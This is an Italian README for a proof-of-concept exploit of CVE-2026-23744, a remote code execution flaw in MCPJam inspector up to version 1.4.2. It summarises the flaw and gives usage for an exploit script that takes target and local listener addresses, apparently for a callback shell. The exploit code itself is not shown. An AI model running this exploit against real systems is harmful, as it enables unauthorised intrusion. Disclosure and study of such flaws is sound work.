
CVE-2026-23744 Prova di concetto.
MCPJam inspector è una piattaforma di sviluppo local-first per server MCP. Le versioni <=1.4.2 sono vulnerabili a una vulnerabilità di esecuzione remota di codice, che consente a un attaccante di inviare una richiesta HTTP appositamente predisposta che attiva l'installazione di un server MCP, portando a RCE. Per i dettagli sulla vulnerabilità, consultare i riferimenti.
$ pip install requests
$ python3 exploit.py [-h] [--lhost LHOST] [--lport LPORT] [--rhost RHOST] [--rport RPORT]
-h, --help show the help message and exit
--lhost LHOST local host IP
--lport LPORT local host port
--rhost RHOST remote IP
--rport RPORT remote port